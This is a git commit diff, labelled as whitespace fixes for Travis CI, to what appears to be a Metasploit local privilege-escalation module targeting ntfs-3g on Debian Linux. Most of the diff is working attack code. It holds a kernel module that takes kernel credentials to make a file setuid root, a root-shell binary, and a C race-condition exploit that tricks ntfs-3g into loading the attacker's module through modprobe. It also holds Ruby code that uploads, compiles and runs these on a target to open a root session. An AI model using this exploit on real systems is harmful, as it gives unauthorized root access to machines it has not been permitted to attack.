forgot add fixes for travis
parent
a8609f5c66
commit
0c353841ab
|
@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
# check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
|
||||
def headers_installed?()
|
||||
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
|
||||
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
|
||||
if output
|
||||
if output.include?('linux-headers')
|
||||
return true
|
||||
|
@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
CheckCode::Appears
|
||||
else
|
||||
print_error("Version installed not vulnerable: #{output}")
|
||||
CheckCode::Safe
|
||||
CheckCode::Safe
|
||||
end
|
||||
else
|
||||
print_error('ntfs-3g not installed')
|
||||
|
@ -132,18 +132,18 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
#include <linux/cred.h>
|
||||
#include <linux/syscalls.h>
|
||||
#include <linux/kallsyms.h>
|
||||
|
||||
|
||||
static int suidfile_fd = -1;
|
||||
module_param(suidfile_fd, int, 0);
|
||||
|
||||
|
||||
static int __init init_rootmod(void) {
|
||||
int (*sys_fchown_)(int fd, int uid, int gid);
|
||||
int (*sys_fchmod_)(int fd, int mode);
|
||||
const struct cred *kcred, *oldcred;
|
||||
|
||||
|
||||
sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown");
|
||||
sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod");
|
||||
|
||||
|
||||
printk(KERN_INFO "rootmod loading\n");
|
||||
kcred = prepare_kernel_cred(NULL);
|
||||
oldcred = override_creds(kcred);
|
||||
|
@ -152,12 +152,12 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
revert_creds(oldcred);
|
||||
return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */
|
||||
}
|
||||
|
||||
|
||||
static void __exit cleanup_rootmod(void) {}
|
||||
|
||||
|
||||
module_init(init_rootmod);
|
||||
module_exit(cleanup_rootmod);
|
||||
|
||||
|
||||
MODULE_LICENSE("GPL v2");
|
||||
}
|
||||
|
||||
|
@ -166,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
#include <err.h>
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
|
||||
int main(void) {
|
||||
if (setuid(0) || setgid(0))
|
||||
err(1, "setuid/setgid");
|
||||
|
@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
#include <sys/wait.h>
|
||||
#include <time.h>
|
||||
#include <sys/utsname.h>
|
||||
|
||||
|
||||
int main(void) {
|
||||
/* prevent shell from backgrounding ntfs-3g when stopped */
|
||||
pid_t initial_fork_child = fork();
|
||||
|
@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
execl("rootshell", "rootshell", NULL);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
char buf[1000] = {0};
|
||||
// Set up workspace with volume, mountpoint, modprobe config and module directory.
|
||||
char template[] = "/tmp/ntfs_sploit.XXXXXX";
|
||||
|
@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
template, template);
|
||||
if (system(system_cmd))
|
||||
errx(1, "shell command failed");
|
||||
|
||||
|
||||
// Set up inotify watch for /proc/mounts.
|
||||
// Note: /proc/mounts is a symlink to /proc/self/mounts, so
|
||||
// the watch will only see accesses by this process.
|
||||
|
@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
err(1, "unable to create inotify fd?");
|
||||
if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
|
||||
err(1, "unable to watch /proc/mounts");
|
||||
|
||||
|
||||
// Set up inotify watch for /proc/filesystems.
|
||||
// This can be used to detect whether we lost the race.
|
||||
int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
|
||||
|
@ -256,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
err(1, "unable to create inotify fd?");
|
||||
if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
|
||||
err(1, "unable to watch /proc/filesystems");
|
||||
|
||||
|
||||
// Set up inotify watch for /sbin/modprobe.
|
||||
// This can be used to detect when we can release all our open files.
|
||||
int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
|
||||
|
@ -264,7 +264,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
err(1, "unable to create inotify fd?");
|
||||
if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
|
||||
err(1, "unable to watch /sbin/modprobe");
|
||||
|
||||
|
||||
int do_exec_pipe[2];
|
||||
if (pipe2(do_exec_pipe, O_CLOEXEC))
|
||||
err(1, "pipe");
|
||||
|
@ -280,16 +280,16 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
|
||||
}
|
||||
child = getpid();
|
||||
|
||||
|
||||
// Now launch ntfs-3g and wait until it opens /proc/mounts
|
||||
if (write(do_exec_pipe[1], buf, 1) != 1)
|
||||
errx(1, "pipe write failed");
|
||||
|
||||
|
||||
if (read(inotify_fd, buf, sizeof(buf)) <= 0)
|
||||
errx(1, "inotify read failed");
|
||||
if (kill(getppid(), SIGSTOP))
|
||||
err(1, "can't stop setuid parent");
|
||||
|
||||
|
||||
// Check whether we won the main race.
|
||||
struct pollfd poll_fds[1] = {{
|
||||
.fd = fs_inotify_fd,
|
||||
|
@ -308,7 +308,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
exit(1);
|
||||
}
|
||||
puts("looks like we won the race");
|
||||
|
||||
|
||||
// Open as many files as possible. Whenever we have
|
||||
// a bunch of open files, move them into a new process.
|
||||
int total_open_files = 0;
|
||||
|
@ -342,13 +342,13 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
if (reached_limit)
|
||||
break;
|
||||
}
|
||||
|
||||
|
||||
// Wake up ntfs-3g and keep allocating files, then free up
|
||||
// the files as soon as we're reasonably certain that either
|
||||
// modprobe was spawned or the attack failed.
|
||||
if (kill(getppid(), SIGCONT))
|
||||
err(1, "SIGCONT");
|
||||
|
||||
|
||||
time_t start_time = time(NULL);
|
||||
while (1) {
|
||||
for (int i=0; i<1000; i++) {
|
||||
|
@ -425,7 +425,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
|
||||
print_status('Writing files to target')
|
||||
cmd_exec("cd #{datastore['WritableDir']}")
|
||||
|
||||
|
||||
#write all the files and compile. This is equivalent to the original compile.sh
|
||||
#gcc -o rootshell rootshell.c -Wall
|
||||
upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall")
|
||||
|
@ -443,7 +443,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
cmd_exec('/sbin/depmod -b depmod_tmp/')
|
||||
cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .')
|
||||
cmd_exec('rm -rf depmod_tmp')
|
||||
|
||||
|
||||
register_file_for_cleanup("#{rootmod_path}.ko")
|
||||
register_file_for_cleanup("#{rootmod_path}.mod.c")
|
||||
register_file_for_cleanup("#{rootmod_path}.mod.o")
|
||||
|
@ -454,7 +454,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
output = cmd_exec(sploit_path)
|
||||
unless session_created?
|
||||
# this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened,
|
||||
# but binary payload was caught, or NIPS shut down the callback etc.
|
||||
# but binary payload was caught, or NIPS shut down the callback etc.
|
||||
vprint_error(output)
|
||||
end
|
||||
end
|
||||
|
|